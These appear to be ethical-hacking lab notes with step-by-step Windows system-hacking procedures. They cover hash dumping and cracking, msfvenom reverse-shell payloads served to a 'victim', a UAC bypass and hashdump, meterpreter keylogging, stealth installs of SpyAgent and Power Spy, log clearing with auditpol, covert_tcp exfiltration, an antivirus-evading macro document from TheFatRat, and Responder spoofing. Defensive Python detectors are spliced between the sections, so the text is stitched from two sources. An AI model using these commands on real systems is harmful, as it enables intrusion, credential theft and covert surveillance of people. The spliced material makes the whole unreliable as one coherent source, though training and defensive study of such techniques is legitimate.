System Hacking

-- The goal of system hacking is to gain:

    1. Access
    2. Escalate Privileges
    3. Recovering Passwords
    4. Execute applications
    5. Hide files

-- System hacking is used for:

    1. Extracting administrative passwords
    2. Hiding files and extracting hidden files
    3. Recovering passwords
    4. Monitoring a system remotely

-- Password cracking is one of the stages of system hacking.
-- A password is needed to access a system.
-- Password cracking is done by guessing or by using automated tools and techniques.
-- Password cracking techniques include the dictionary and brute-force methods.
-- Password cracking techniques succeed because passwords are weak or easy to guess.


1. Dumping and Cracking SAM Hashes to Extract Plaintext Password

-- SAM (Security Account Manager) is a database file present on Windows machines that stores the user
   accounts and security descriptors of the users of the local computer.

-- It stores users' passwords in hashed form (LM or NTLM hash).

-- Attackers generally dump the operating system's password hashes immediately after compromising a target machine.

-- Administrator access is needed to dump the contents of the SAM file.

-- A hash cracker is then used to uncover the plaintext passwords.

-- Pwdump7 can also be used to dump protected files.

-- Rainbow tables for LM hashes of alphanumeric passwords are provided by the developers.

    1. Use the pwdump7 tool to extract the password hashes
    2. Use the Ophcrack tool to crack the hashes and obtain the plaintext passwords

 
--> Open the Windows command prompt and enter the following to get each account's name and SID
# wmic useraccount get name,sid

Tool : pwdump7

--> Copy the pwdump7 folder and open that folder in the command prompt

--> Type PwDump7.exe and press Enter

--> To save the extracted hashes to a text file, type the following and press Enter
# PwDump7.exe > c:\hashes.txt -- saved on the C drive


Tool : ophcrack -- Windows tool

--> Open the ophcrack application

--> Click the Load tab and select PWDUMP file from the list.

--> Click Tables on the top menu, select Vista free in the list and click Install

--> A window appears asking for the folder which contains the tables; select tables_vista_free.

--> The table is installed under Vista free, shown in green. Click OK

--> Click Crack on the menu bar to crack the password hashes.


2. Creating and Using Rainbow Tables :

-- Rainbow Table : A precomputed table which contains word lists (dictionary files and
   brute-force lists) together with their hash values.

-- It is used to recover a plaintext password from a ciphertext (hash).

-- An attacker captures the hash of a password and compares it with the precomputed hash table.

-- If a match is found, the password is cracked.

Tool : winrtgen -- a Windows-based tool

--> Install winrtgen on Windows and click Add Table

--> Select ntlm from the Hash dropdown list

--> Set Min Len to 4, Max Len to 6 and Chain Count to 4000000

--> Select loweralpha from the Charset dropdown list (the setting depends on the password) and click OK

--> The file to be created is displayed in the Winrtgen window; click OK

--> It automatically turns to Start; click the Start button to generate the rainbow tables.

--> The rainbow table is automatically saved in the folder

--> Run RainbowCrack and launch the rcrack_gui executable.

--> Click File on the menu bar and click Load NTLM Hashes from Pwdump File

--> Click Rainbow Table on the menu bar and click Search Rainbow Tables

--> Open the folder where the rainbow table was saved, select it and click Open

--> RainbowCrack automatically starts cracking the hashes and we find the plaintext password
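The rainbow-table mechanism described at the start of this section, as an added Python example (not code from these notes or from the winrtgen/RainbowCrack projects): a toy table over three lowercase letters with SHA-256 standing in for NTLM, a lookup that recovers a password from an unsalted hash, and the defender's caveat that a salt makes the same table useless. The chain length, charset and start points are assumed toy values.

```python
"""Toy rainbow table: why unsalted LM/NTLM hashes fall to precomputation."""
import hashlib
import itertools
import string
from typing import Dict, Iterable, Optional

CHARSET = string.ascii_lowercase   # "loweralpha" in winrtgen's terms
PW_LEN = 3                         # Min Len = Max Len = 3 (assumed toy size)
CHAIN_LEN = 50                     # hash/reduce steps per chain


def h(password: str, salt: str = "") -> bytes:
    """Stand-in for NTLM (which has no salt, hence the empty default)."""
    return hashlib.sha256((salt + password).encode()).digest()


def reduce_fn(digest: bytes, step: int) -> str:
    """Map a digest back into the password space.

    The column index is mixed in so each column uses a different reduction
    function; that is what makes the table a *rainbow* table and limits
    chain merges.
    """
    n = int.from_bytes(digest[:8], "big") + step
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def build_table(start_points: Iterable[str]) -> Dict[str, str]:
    """Precompute chains; only (end point -> start point) is kept, as on disk."""
    table: Dict[str, str] = {}
    for start in start_points:
        pw = start
        for step in range(CHAIN_LEN):
            pw = reduce_fn(h(pw), step)
        table.setdefault(pw, start)   # first chain to reach an end point wins
    return table


def lookup(table: Dict[str, str], target: bytes) -> Optional[str]:
    """Recover the password behind `target` if a stored chain contains it."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target sits in column `pos` and finish the chain.
        pw = reduce_fn(target, pos)
        for step in range(pos + 1, CHAIN_LEN):
            pw = reduce_fn(h(pw), step)
        start = table.get(pw)
        if start is None:
            continue
        # Candidate chain: walk it from the start and confirm the hash.
        cand = start
        for step in range(CHAIN_LEN):
            if h(cand) == target:
                return cand
            cand = reduce_fn(h(cand), step)
    return None


def default_table() -> Dict[str, str]:
    """A few hundred evenly spaced start points; "abc" is included on purpose."""
    everything = ("".join(p) for p in itertools.product(CHARSET, repeat=PW_LEN))
    return build_table(["abc"] + list(itertools.islice(everything, 0, None, 37)))


if __name__ == "__main__":
    table = default_table()
    print("unsalted 'abc' ->", lookup(table, h("abc")))             # abc
    print("salted   'abc' ->", lookup(table, h("abc", salt="x1")))  # None
```

The salted lookup fails because the table was built over unsalted hashes; a per-user salt forces one table per salt, which is why salted password storage resists this attack and unsalted NTLM does not.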


3. Auditing System Password Using L0phtCrack :

Tool : L0phtCrack -- Window Tool

-- Crack system user account passwords

-- User account passwords that are cracked in a short amount of time are considered weak and should be made stronger

-- Use the L0phtCrack tool to find user passwords that can be easily cracked


--> Install and launch the application

--> Proceed with the Free Trial

--> Click Password Auditing Wizard and click Next

--> Choose Target System and click Next. Select a remote machine and click Next

--> Fill in the details: Host name [IP address of target]

--> Select the Use Specific User Credentials radio button

--> Enter the credentials (Username, Password, Domain) and click Next

--> In the Choose Audit Type section, select Strong Password Audit and click Next

--> The reporting options are selected by default; click Next

--> Select Run this job immediately, click Next and click Finish

--> In this way we successfully cracked the password


4. Exploiting Client Side Vulnerabilities and Establishing a VNC session

-- VNC enables an attacker to gain access to and control of the target system from anywhere in the world.

Tool : Metasploit > msfvenom > msfconsole

--> Open a terminal and type
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[our ip] LPORT=4444 -o /root/Desktop/Payload.exe

--> Now create a directory to share this file with the victim machine, set its permissions and copy the file from the Desktop to the shared location.
# mkdir /var/www/html/share -- create a share folder
# chmod -R 755 /var/www/html/share -- set permissions
# chown -R www-data:www-data /var/www/html/share
# mv /root/Desktop/Payload.exe /var/www/html/share -- move the malicious file into the shared folder

--> Open Metasploit in msfconsole
# msfconsole

# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# set LPORT 4444
# exploit -- our handler is running now

--> On the Windows target machine, open a browser and type http://[kali ip]/share

--> Download the Payload.exe file and run it

--> If the meterpreter prompt does not appear, type
# sessions -i 1

--> Return to the Kali machine and observe that we are connected to a meterpreter session

--> To get the system information of the victim machine
# meterpreter > sysinfo

--> To start a VNC session with the victim, type
# run vnc

--> A window appears showing the victim's desktop

5. Escalating Privileges by Exploiting Client Side Vulnerabilities

-- The exploitation procedure is performed on a weakly patched Windows machine: it allows us
   to gain access through a meterpreter shell and then employ privilege escalation
   techniques to obtain administrative privileges on the machine through the meterpreter shell

-- Escalate privileges on a victim machine by exploiting its vulnerabilities

Tool : Metasploit > msfvenom > msfconsole

--> Open a terminal
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[our IP] -f exe > Desktop/Payload.exe

--> Now create a directory to share this file with the victim machine, set its permissions and copy the file from the Desktop to the shared location.
# mkdir /var/www/html/share -- create a share folder
# chmod -R 755 /var/www/html/share -- set permissions
# chown -R www-data:www-data /var/www/html/share
# ls -la /var/www/html/ | grep share

--> Next start the Apache server
# service apache2 start
# cp /root/Desktop/Payload.exe /var/www/html/share -- share the payload with the Windows machine

--> Start msfconsole

# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# exploit -j -z -- start the listener as a background job


--> On the Windows target machine, open a browser and type http://[kali ip]/share

--> Download the Payload.exe file and run it

--> If the meterpreter prompt does not appear, type
# sessions -i 1

--> Return to the Kali machine and observe that we are connected to a meterpreter session

--> To get the server username, type
# meterpreter > getuid

--> To dump the password hashes
# meterpreter > run post/windows/gather/smart_hashdump -- the command fails because we do not have sufficient privileges

--> Now we try to escalate privileges by bypassing User Account Control

--> # getsystem -- attempts to elevate the user's privileges
# getsystem -t 1 -- the command fails because of insufficient user privileges

--> Background the meterpreter session
# background

--> Use the module
# use exploit/windows/local/bypassuac_fodhelper
# show options
# set SESSION 1 -- the session we backgrounded
# set payload windows/meterpreter/reverse_tcp
# show options
# set LHOST [our ip]
# set Target 0
# exploit

--> Reuse the getsystem command: type getsystem and press Enter, then type getuid and press Enter.
    The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM)

--> Try to dump the password hashes again with
# meterpreter > run post/windows/gather/smart_hashdump -- meterpreter successfully extracts the NTLM hashes and displays them in the terminal

--> We successfully dumped the password hashes


6. Hacking Windows 10 using Metasploit and Post Exploitation Using Meterpreter

-- Backdoors are malicious files that contain a Trojan.

-- Attackers build backdoors in an attempt to gain remote access to victim machines.

-- Backdoors are delivered through email, file-sharing web applications and shared network drives, and
   the user is forced to execute them.

-- We then perform activities such as keylogging, sensitive data extraction and so on.

-- A Trojan is a program that contains malicious or harmful code.

-- Detect Trojan and backdoor attacks.

-- Create a server and test the network for the attack.

-- Attack a network using a sample backdoor and monitor system activity.


--> We have a secret information file on the Desktop of the Windows machine

--> Open the Linux machine, launch a terminal and type
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[our IP] -f exe > Desktop/Malware.exe
# mkdir /var/www/html/share
# service apache2 start
# cp /root/Desktop/Malware.exe /var/www/html/share

--> Start msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# show options
# exploit -j -z


--> On the Windows target machine, open a browser and type http://[kali ip]/share

--> Download the Malware.exe file and run it

--> If the meterpreter prompt does not appear, type
# sessions -i 1

--> Return to the Kali machine and observe that we are connected to a meterpreter session

# meterpreter > sysinfo

# meterpreter > ifconfig -- displays the victim machine's IP address and MAC address

# getuid -- shows the user the Meterpreter server is running as on the host (administrator here)

# pwd -- shows the current directory

# ls -- lists the files in the remote directory

--> If we find the secret information file, read it with
# cat filename.txt -- shows all the information contained in the file.

--> To view the MACE attributes of a file
# timestomp secret.txt -v -- displays the created, accessed, modified and entry-modified times

--> Change the remote directory
# cd C:\ -- type ls to list the files
# download bootmgr
# search -f [filename.ext] -- search the remote file system for a file by name, e.g. pagefile.sys
# keyscan_start -- starts capturing all keyboard input on the victim system.
# keyscan_dump -- dumps the captured keystrokes
# idletime -- displays the number of seconds the user has been idle on the remote system
# shutdown -- shuts down the victim machine


7. User System Monitoring and Surveillance Using Spytech spyAgent :

-- In this lab we establish a Remote Desktop connection with the victim machine and run a spying application,
   SpyAgent, to secretly track user activities.

-- Install and configure Spytech SpyAgent on the victim machine

-- Monitor keystrokes typed, websites visited and Internet traffic data

Tool : Remote Desktop Connection (Windows)

--> Click Search on the taskbar and search for Remote Desktop Connection

--> Open the application and enter the IP address of the Windows target machine

--> Enter the user name Administrator and click Connect

--> The host machine tries to establish a remote connection with the target machine.

--> A Windows Security pop-up appears. Enter the password for the Administrator account that we obtained with the L0phtCrack tool, click OK and click Yes

--> The Remote Desktop connection is established. Set up Spytech SpyAgent by double-clicking Setup (password=spytech)

Tool : SpyAgent > System hacking > General Spyware

--> Install the tool, fill in the Password field and click OK

--> Configuration -- click Complete + Stealth Configuration

--> Extras -- click Load on Windows Startup

--> Click Next until Finish

--> The SpyAgent template is displayed; click Start Monitoring and enter the password we created

--> In this way we spy on the victim machine and monitor the system



8. Web Activity Monitoring and Recording using Power Spy :

-- This only works if the target machine is turned on

-- Establish a Remote Desktop connection as the attacker, install Power Spy and leave it in stealth mode

-- Spy on the victim and the victim's activities.

Tool : Power Spy

--> Follow the steps above to connect with Remote Desktop Connection; when the connection is established, go to the next step

--> Install Power Spy and run the application, then set up the login password; the Spyware Wizard opens

--> Click Start Monitoring and also click Stealth Mode (stealth mode runs Power Spy completely invisibly on the computer)

--> The Hotkey reminder dialog box appears; click OK (to unhide Power Spy, use Ctrl+Alt+X)

--> Disconnect the Remote Desktop connection

--> Log in to the victim machine and do some activity

--> Now return to our machine, establish the Remote Desktop connection again and open the Power Spy application

--> To check the user's keystrokes, click Keylogger in the Power Spy control panel

 

9. Hiding Files Using NTFS Streams :

-- Use NTFS streams

-- Hide files

--> Make sure that the C:\ drive's file system is NTFS. To check this, go to 'Computer', right-click the 'C' drive and click Properties

--> Go to the C drive, create a folder named magic and paste calc.exe (Windows\system32\calc.exe) into it

--> Launch the command prompt

# cd c:\magic
# notepad hide.txt

--> A Notepad pop-up appears; click 'Yes' and write some text in the file

--> Type
# dir -- lists all files, including the one we created, and displays their sizes

--> Now hide calc.exe inside the text file (hide.txt)
# type c:\magic\calc.exe > c:\magic\hide.txt:calc.exe

--> The text file's size does not change. Now type the command
# mklink backdoor.exe hide.txt:calc.exe
# backdoor.exe -- the Calculator application is executed
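A defender's check for the technique above, as an added Python example (not part of these notes): plain `dir` never shows the stream and hide.txt's size stays the same, but `dir /R` lists every stream as name:stream:$DATA, and this script parses that listing and flags streams that hold executables or are unusually large. The listing and the size threshold are constructed/assumed; on the host itself, PowerShell's `Get-Item -Path hide.txt -Stream *` gives the same information.

```python
"""Find NTFS alternate data streams in `dir /R` output."""
import re
from typing import Dict, List

# Streams Windows itself writes; normally benign (Mark-of-the-Web and friends).
BENIGN_STREAMS = {"Zone.Identifier", "SmartScreen", "encryptable"}
EXEC_EXT = (".exe", ".dll", ".com", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")
BIG_STREAM = 4096   # assumed threshold: text files rarely carry big side streams

# A stream line carries a size but no date/time column, and ends in :$DATA.
STREAM_RE = re.compile(
    r"^\s+(?P<size>[\d,]+)\s+(?P<file>[^:\r\n]+?):(?P<stream>[^:\r\n]+):\$DATA\s*$"
)

# Constructed listing for the c:\magic folder of the lab plus one downloaded exe.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of c:\\magic

10/02/2020  10:31 AM    <DIR>          .
10/02/2020  10:31 AM    <DIR>          ..
10/02/2020  10:30 AM            27,648 calc.exe
10/02/2020  10:32 AM                18 hide.txt
                                27,648 hide.txt:calc.exe:$DATA
10/02/2020  09:10 AM           812,544 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               3 File(s)        840,210 bytes
               2 Dir(s)  12,345,678,912 bytes free
"""


def parse_dir_r(listing: str) -> List[Dict[str, object]]:
    """One record per alternate data stream in a `dir /R` listing."""
    found: List[Dict[str, object]] = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if m:
            found.append({"file": m["file"].strip(), "stream": m["stream"],
                          "size": int(m["size"].replace(",", ""))})
    return found


def classify(rec: Dict[str, object]) -> str:
    """benign / suspicious / review, from the stream's name and size."""
    name = str(rec["stream"])
    if name in BENIGN_STREAMS:
        return "benign"
    # An executable parked in a text file's stream is exactly the calc.exe trick.
    if name.lower().endswith(EXEC_EXT) or int(rec["size"]) >= BIG_STREAM:
        return "suspicious"
    return "review"


def report(listing: str) -> List[str]:
    """One line per stream, suspicious ones first."""
    recs = sorted(parse_dir_r(listing), key=lambda r: classify(r) != "suspicious")
    return [f"{classify(r):10} {r['file']}:{r['stream']} ({r['size']} bytes)"
            for r in recs]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_DIR_R)))
```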


10. Hiding Data Using White Space Steganography

Tool : Snow (Windows)

-- Snow exploits the steganographic nature of whitespace.

-- It uses the ICE encryption algorithm

-- Use Snow steganography to hide files and data

-- Hide files using spaces and tabs

--> Open a new Notepad file, type some text and press Enter, then hold down the hyphen key to draw a line below it

--> Save the file as secret.txt in the folder where SNOW.EXE is located in the Steganography tools

--> Open a command-line terminal and go to that folder in the Snow directory

--> Then type the command
# snow -C -m "My Credit Card Number is 123456789" -p "stegno" secret.txt secret2.txt

--> The data (the credit card number) is hidden inside secret2.txt along with the contents of secret.txt

--> The content of secret2.txt is secret.txt + my credit card number

--> Now type
# snow -C -p "stegno" secret2.txt --- shows the hidden contents (stegno is the password entered while hiding the data)

--> To check the file in the GUI, open secret2.txt in Notepad and select the text; the data is hidden in the spaces and tabs

--> In this way we hide data in whitespace (spaces and tabs)
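A defender's check for the technique above, as an added Python example (not part of these notes or of the SNOW tool): it scans a text file for the trailing space/tab runs that whitespace steganography leaves behind, and strips them, which destroys the hidden payload while keeping the visible text. The sample texts are constructed; the whitespace pattern only illustrates the shape of a carrier file and is not SNOW's actual encoding.

```python
"""Detect and neutralise whitespace steganography in a text file."""
from typing import Dict, List, Tuple

CLEAN_TEXT = "Meeting notes\n-------------\nAll fine.\n"
# Constructed carrier: the same text with trailing space/tab runs appended to
# every line, the shape a SNOW output file has (pattern is illustrative only).
STEGO_TEXT = "Meeting notes \t  \t \n-------------\t   \t\t \nAll fine.  \t \t   \n"


def trailing_ws(line: str) -> str:
    """Whitespace after the last visible character (line ending excluded)."""
    body = line.rstrip("\r\n")
    return body[len(body.rstrip(" \t")):]


def scan(text: str) -> Dict[str, object]:
    """Trailing-whitespace statistics; mixed tabs and spaces is the strong signal."""
    lines = text.splitlines()
    hits: List[Tuple[int, int, bool]] = []      # (line number, run length, mixed?)
    for no, line in enumerate(lines, 1):
        ws = trailing_ws(line)
        if ws:
            hits.append((no, len(ws), "\t" in ws and " " in ws))
    mixed = sum(1 for _, _, m in hits if m)
    return {
        "lines": len(lines),
        "lines_with_trailing_ws": len(hits),
        "mixed_tab_space_lines": mixed,
        "trailing_ws_chars": sum(n for _, n, _ in hits),
        # Assumed rule of thumb: half or more of the lines end in mixed runs.
        "suspicious": len(lines) > 0 and mixed >= max(1, len(lines) // 2),
    }


def sanitize(text: str) -> str:
    """Strip trailing spaces/tabs: the visible text survives, the payload does not."""
    cleaned = "\n".join(line.rstrip(" \t") for line in text.splitlines())
    return cleaned + ("\n" if text.endswith("\n") else "")


if __name__ == "__main__":
    print(scan(STEGO_TEXT))
    print(sanitize(STEGO_TEXT) == CLEAN_TEXT)   # True
```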


11. Image Steganography Using OpenStego :

-- Text can be hidden inside an image using the OpenStego tool.

Tool : OpenStego (Windows)

-- OpenStego is a Java-based application and supports password-based encryption for security

-- It uses the DES algorithm for data encryption, in conjunction with MD5 hashing to derive the DES key from the password provided.

--> Install the Setup-OpenStego.exe file and follow the wizard

--> Launch the application from the Start menu

--> In the OpenStego window, click the ellipsis (...) under the Message File section and select the file to hide

--> Enter the cover file: this is the image in which we hide our data

--> Both the message file and the cover file are now loaded. Performing steganography hides the message in the image file given under Output Stego File

--> To save, select Output Stego File, provide the file name stego and click Open

--> Click Hide Data -- the message has been successfully hidden. Click OK

--> When you view the image you only see the image, not the message contents (text file) embedded in it

--> In the OpenStego window, click Extract Data

--> Give the Input Stego File and then the location to extract the hidden file to




12. Image Steganography Using Quick Stego :

Tool : Quick Stego (Windows)

--- In digital steganography, electronic communications may include steganographic coding hidden inside a transport layer

--- Learn how to hide a secret text message in images using Quick Stego

---> Install QS12Setup.exe and follow the wizard

---> Click Open Image and load the image in which we are hiding the data

---> To hide the data, click Open Text under Text File, load the text file and click Hide Text

---> Save the image; when we view the saved image, it appears to be a normal image.

---> To decrypt the text, load the stego file with Open Image

---> The hidden text inside the image is displayed. In real-world attacks, steganography tools are used to obtain hidden information


13. Viewing , Enabling and Clearing Audit Policies Using Auditpol :

--- We can manipulate, disable or erase the system logs

--- Attackers can use built-in system utilities to disable or tamper with the logging and auditing mechanisms of the system

--- Auditpol displays information about and performs functions to manipulate audit policies.

---> Open the command prompt with administrative privileges in Windows. To view all the audit policies, type
# auditpol /get /category:*

---> To enable audit policies, type
# auditpol /set /category:"system","account logon" /success:enable /failure:enable

---> To check that the audit policies are enabled
# auditpol /get /category:*

---> To clear the audit policies
# auditpol /clear /y

--- In this way we view and clear the auditing policies
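The defender's side of this section, as an added Python example (not part of these notes): it parses the output of `auditpol /get /category:*`, compares it against a baseline and raises an alert when every subcategory reads "No Auditing", which is what the machine reports after `auditpol /clear /y`. Both dumps below are constructed in auditpol's layout, and the baseline is an assumed minimal one, not a Microsoft recommendation.

```python
"""Compare an `auditpol /get /category:*` dump against a minimal baseline."""
import re
from typing import Dict, List

SETTINGS = ("Success and Failure", "Success", "Failure", "No Auditing")

# Assumed illustrative baseline: subcategory -> setting it must include.
BASELINE: Dict[str, str] = {
    "Security State Change": "Success",
    "Logon": "Success and Failure",
    "Audit Policy Change": "Success",
    "Process Creation": "Success",
}

# Constructed dumps: categories flush left, subcategories indented, columns
# separated by runs of spaces, exactly as auditpol prints them.
ENABLED_DUMP = """\
System audit policy
Category/Subcategory                      Setting
System
  Security State Change                   Success
Logon/Logoff
  Logon                                   Success and Failure
Policy Change
  Audit Policy Change                     Success
Detailed Tracking
  Process Creation                        No Auditing
"""

# What the same machine reports after `auditpol /clear /y`.
CLEARED_DUMP = """\
System audit policy
Category/Subcategory                      Setting
System
  Security State Change                   No Auditing
Logon/Logoff
  Logon                                   No Auditing
Policy Change
  Audit Policy Change                     No Auditing
Detailed Tracking
  Process Creation                        No Auditing
"""


def parse_auditpol(dump: str) -> Dict[str, str]:
    """Map subcategory -> setting; only the indented lines carry settings."""
    policy: Dict[str, str] = {}
    for line in dump.splitlines():
        if not line.startswith("  "):
            continue                      # header or category line
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) == 2 and parts[1] in SETTINGS:
            policy[parts[0]] = parts[1]
    return policy


def satisfies(actual: str, required: str) -> bool:
    """'Success and Failure' covers any requirement; otherwise exact match."""
    return actual == "Success and Failure" or actual == required


def audit_findings(dump: str) -> List[str]:
    """Baseline deviations, plus an alert when the whole policy was cleared."""
    policy = parse_auditpol(dump)
    findings: List[str] = []
    if policy and all(v == "No Auditing" for v in policy.values()):
        # The clearing itself is logged as event 4719 if Audit Policy Change was on.
        findings.append("ALERT: every subcategory is 'No Auditing' (policy cleared?)")
    for sub, required in BASELINE.items():
        actual = policy.get(sub, "missing")
        if actual == "missing" or not satisfies(actual, required):
            findings.append(f"{sub}: is '{actual}', baseline requires '{required}'")
    return findings
```

Run `audit_findings(ENABLED_DUMP)` and `audit_findings(CLEARED_DUMP)` to see the single baseline gap in the first dump and the cleared-policy alert in the second.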


14. Covert Channels using Covert_TCP

--- Networks use network access control permissions to permit/deny traffic

--- Tunneling is used to bypass the access control rules of firewalls, IDS, IPS and web proxies to allow certain traffic

--- Covert channels can be made by inserting data into unused fields of protocol headers

--- There are many unused or misused fields in TCP/IP over which data can be sent to bypass firewalls.

--- Covert_TCP manipulates the TCP/IP header of the data packet to send a file one byte at a time from any host to a destination

--- It can act as a server as well as a client and can be used to hide the data transmitted inside an IP header

--- This is useful for bypassing firewalls and sending data in legitimate-looking packets that contain no data for sniffers to analyze

--- How to carry covert traffic inside unused fields of the TCP and IP headers

---> Open a terminal in Linux
# cd Desktop
# mkdir send
# cd send
# echo "Important Message" > secret.txt

---> Click Files in the favourites bar on the Kali desktop and select Other Locations

---> Type smb://[ip address of our machine] in the Connect to Server field at the bottom of the Files window and press Enter

---> It asks for Username, Domain and Password [connect with the Administrator username for full privileges; the password is the one we recovered by cracking the hashes]

---> Navigate to the Covert_TCP module under System Hacking > Covert_TCP, choose covert_tcp.c and copy the file

---> Paste the covert_tcp.c file into the send folder on the Desktop

---> Type in the terminal
# cc -o covert_tcp covert_tcp.c

---> Switch to Ubuntu and type the password [the password is the one for our Kali Linux]

---> In Ubuntu open a terminal and type
# cd Desktop
# mkdir receive
# cd receive

---> Open Other Locations in Files and type smb://[ip address of our machine] in the Server Address field

---> The username and password are the same as the ones we entered the first time; click Connect

---> Navigate to System Hacking > Covert_TCP, copy the covert_tcp.c file to the clipboard and paste it into the receive folder

---> Run the same command as above and press Enter
# cc -o covert_tcp covert_tcp.c
# sudo su --- enter the password

---> To start the listener, type
# ./covert_tcp -dest [destination ip address] -source [source ip address] -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/receive/receive.txt

---> Go to our Linux machine and open Wireshark

---> Select the eth0 interface and start capturing network packets

---> In the terminal, type the following to send the contents of secret.txt through covert_tcp
# ./covert_tcp -dest [destination ip address] -source [source ip address] -source_port 8888 -dest_port 9999 -file /root/Desktop/send/secret.txt

---> Open Ubuntu: we observe the message being received byte by byte. Open the receive folder and open receive.txt; it contains the message sent from the Kali machine

---> Go to the Kali machine and stop the Wireshark packet capture

---> Examining the communication between the Ubuntu and Kali machines, we find each character of the message string being sent in an individual packet over the network

---> In Wireshark, apply a filter with the Ubuntu IP address [receiver/destination ip address] and the Kali machine IP address [sender/source ip address] to show the captured packets

---> Covert_tcp changes a header field of the TCP packets, replacing it with one character of the string at a time, and so sends the message without being detected
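The detection side of what Wireshark shows above, as an added Python example (not part of these notes or of covert_tcp itself): it groups bare SYN packets by flow and flags a flow whose IP identification values all fall in the printable-ASCII range, which is what one character per packet looks like to an analyst. It assumes the channel uses the IP ID field (one of covert_tcp's modes; the notes only say "header field"), and the packet records are a constructed stand-in for a capture.

```python
"""Spot a covert_tcp-style channel in a packet trace."""
from collections import defaultdict
from typing import Dict, List, Tuple

Packet = Dict[str, object]            # src, dst, dport, syn, payload_len, ip_id
Flow = Tuple[str, str, int]           # (src, dst, dport)

MIN_RUN = 6     # fewer empty SYNs than this to one port is ordinary retry noise


def constructed_trace() -> List[Packet]:
    """Constructed: the lab's 'Important Message' flow interleaved with normal HTTPS."""
    pkts: List[Packet] = []
    for i, ch in enumerate("Important Message"):
        # Assumed channel: one ASCII character per bare SYN, carried in the IP ID.
        pkts.append({"src": "10.0.0.5", "dst": "10.0.0.9", "dport": 9999,
                     "syn": True, "payload_len": 0, "ip_id": ord(ch)})
        if i % 4 == 0:   # an ordinary connection: counter-like IDs, real payload
            pkts.append({"src": "10.0.0.5", "dst": "10.0.0.7", "dport": 443,
                         "syn": True, "payload_len": 0, "ip_id": 40000 + i})
            pkts.append({"src": "10.0.0.5", "dst": "10.0.0.7", "dport": 443,
                         "syn": False, "payload_len": 517, "ip_id": 40001 + i})
    return pkts


def suspicious_flows(pkts: List[Packet]) -> Dict[Flow, str]:
    """Flows with a long run of empty SYNs whose IP IDs all look like printable ASCII.

    A normal stack's IP ID is a counter or a random 16-bit value, so a run of
    values confined to 32..126 on handshake packets that never carry data is
    the giveaway. The recovered text is returned for the analyst.
    """
    runs: Dict[Flow, List[int]] = defaultdict(list)
    for p in pkts:
        if p["syn"] and p["payload_len"] == 0:
            runs[(str(p["src"]), str(p["dst"]), int(p["dport"]))].append(int(p["ip_id"]))
    flagged: Dict[Flow, str] = {}
    for flow, ids in runs.items():
        if len(ids) >= MIN_RUN and all(32 <= i <= 126 for i in ids):
            flagged[flow] = "".join(chr(i) for i in ids)
    return flagged


if __name__ == "__main__":
    for flow, text in suspicious_flows(constructed_trace()).items():
        print(f"{flow[0]} -> {flow[1]}:{flow[2]}  ({len(text)} packets)  {text!r}")
```

The equivalent manual check in Wireshark is the display filter `tcp.flags.syn == 1 && tcp.len == 0` for the two addresses, then reading the ip.id column; a covert_tcp run using the sequence-number field instead needs the same heuristic applied to that field.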

15. Hacking Windows Server 2012 with a Malicious Office Document Using TheFatRat

--- In this lab we create a malicious Office document and get a meterpreter shell by bypassing the antivirus system

--- TheFatRat is an exploitation tool which compiles malware with a popular payload; the compiled malware can then be executed on Windows, Android, etc.

--- It provides an easy way to create backdoors and payloads which can bypass most antivirus systems

--- Use an Office document to exploit a Windows machine

Tool : FatRat (Linux)

---> Open a terminal and type
# fatrat

---> FatRat shows a menu of options; choose [06] Create Fud Backdoor 1000% with PwnWinds and press Enter

---> Then choose option [3] Create exe file apache + Powershell and press Enter

---> Set LHOST IP [attacker ip address]
---> Set LPORT 4444

---> Type payload and press Enter at "please enter base name for output files"

---> Choose payload option [3] windows/meterpreter/reverse_tcp and press Enter

---> In the main menu of fatrat choose option [07] create backdoor for Office with microsploit

---> Choose option [2] The microsoft office macro on windows

---> Set LHOST IP and LPORT 4444, press Enter, then type BadDoc --- this is the name of the output file

---> Leave the document body at the default and press Enter; when asked whether you want to use a custom exe backdoor, type y and press Enter

---> Enter the path of the EXE file, i.e. the payload.exe we created

---> Choose payload [3] windows/meterpreter/reverse_tcp and close the fatrat window

# mkdir /var/www/html/share
# mv /root/TheFatRat/output/BadDoc.docm /var/www/html/share

Note : we can also use the Python HTTP server with
# python -m SimpleHTTPServer 8080

# service apache2 start

# msfconsole
# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip address]
# set LPORT 4444
# exploit

---> On the Windows target machine, open a browser and type http://[kali ip]/share

---> Download the BadDoc.docm file and open it

---> If the meterpreter prompt does not appear, type
# sessions -i 1

---> Return to the Kali machine and observe that we are connected to a meterpreter session

# meterpreter > sysinfo

---> In this way we get a shell, bypassing the firewall, with the payload attached to a document

16. Active Online Attack using Responder :

--- By listening for LLMNR/NBT-NS broadcast requests, an attacker can spoof itself as the server

--- Perform an LLMNR/NBT-NS spoofing attack on a network

---> Open a command-line terminal and type
# responder -I eth0

---> Go to Windows 10, click Start, open the Run prompt, type \\ceh-tools and click OK

---> Windows 10 tries to resolve this name; when it can't, it asks the other machines via an LLMNR (UDP/5355) broadcast, and Responder answers them

---> Open Kali Linux and look in /usr/share/responder/logs to view the hashes of the logged-in user collected by Responder

---> To crack the password, open a command terminal and type
# john /usr/share/responder/logs/<log file name>

---> We get the cracked password





